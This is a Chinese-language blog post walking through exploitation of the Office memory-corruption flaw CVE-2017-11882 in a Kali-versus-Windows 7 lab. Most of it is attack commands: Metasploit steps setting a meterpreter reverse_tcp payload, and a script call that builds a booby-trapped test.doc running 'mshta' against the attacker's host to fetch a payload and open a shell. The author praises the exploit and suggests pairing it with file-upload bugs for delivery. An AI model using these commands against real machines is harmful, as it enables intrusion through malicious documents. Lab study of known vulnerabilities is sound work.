炒冷飯系列之利用Office文檔get shell

2017年11月14日,微軟發佈了11月份的安全補丁更新,修復了潛伏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882),這是個Office內存破壞漏洞,影響目前流行的所有Office版本,攻擊者可以利用漏洞以當前登錄的用戶的身份執行任意命令,對於企業來說危害很大。最大的亮點就是這個漏洞完美無彈窗,無視宏,影響Ms offcie全版本,#手動滑稽。


這麼厲害的一個漏洞看的我心裡還是很癢癢的,今天咱們就把這個漏洞的利用過程復現一番~

實驗工具使用的是網上之前放出的Poc以及一個Command43b_CVE-2017-11882.py腳本文件,使用python執行Command43b_CVE-2017-11882.py文件:

炒冷飯系列之利用Office文檔get shell

可以看到這裡生成了一個名為test.doc的office文檔,我們打開試一下:

炒冷飯系列之利用Office文檔get shell

打開office文檔之後立刻跳出了一個計算器,也就是說,利用這個漏洞,我們可以通過office執行其他很多微妙的操作~

既然有這個想法,那麼咱們就祭出滲透大殺器Kali來一窺究竟!

實驗準備:

攻擊機:kali

靶機:windows7

實驗工具:MSF滲透平臺、Command43b_CVE-2017-11882.py、PS_shell.rb、ms17-010.rb(其中PS_shell.rb和ms17-010.rb分別是這個漏洞和之前爆出的“永恆之藍”漏洞的利用模塊)

實驗開始:

首先打開kali,查看IP,可以看到我的虛擬機kali的IP是192.168.1.104。

炒冷飯系列之利用Office文檔get shell

把Command43b_CVE-2017-11882.py和 PS_shell.rb文件放入kali。

我係統中ms17-010.rb文件的路徑是:

/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb

這裡需要把PS_shell.rb放入smb路徑下,然後我這裡就PS_shell.rb和ms17-010.rb放在了一起。

接下來,我們需要請出MSF:

終端下輸入:

Msfconsole

然後重新加載所有模塊:

reload_all

接下來輸入命令:

search PS_shell

調用攻擊模塊:

use /exploits/windows/smb/PS_shell

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.104

set uripath abc

exploit

這一步會出現:

started reverse tcp hander on 192.168.1.104:4444

using url,local ip,,,

mshta.exe"http://192.168.1.104:8080/abc"

如圖:

炒冷飯系列之利用Office文檔get shell

接下來我們要在kali下使用Command43b_CVE-2017-11882.py 這個腳本。

在桌面打開終端執行命令生成剛才演示的這個test.doc:

python Command43b_CVE-2017-11882.py -c"mshta http://192.168.1.104:8080/abc" -o test.doc

將其複製到 win7裡再用 office2013 打開,這裡在win7中打開文檔的時候,kali下msf裡輸入sessions

然後就得到了喜聞樂見的shell~

炒冷飯系列之利用Office文檔get shell

至此,漏洞體驗結束,總的來說這個漏洞非常靈活好用,如果搭配文件上傳之類的漏洞整個過程估計會體驗極好~

很慚愧,只做了一點微小的工作,謝謝大家!

炒冷飯系列之利用Office文檔get shell


分享到:


相關文章: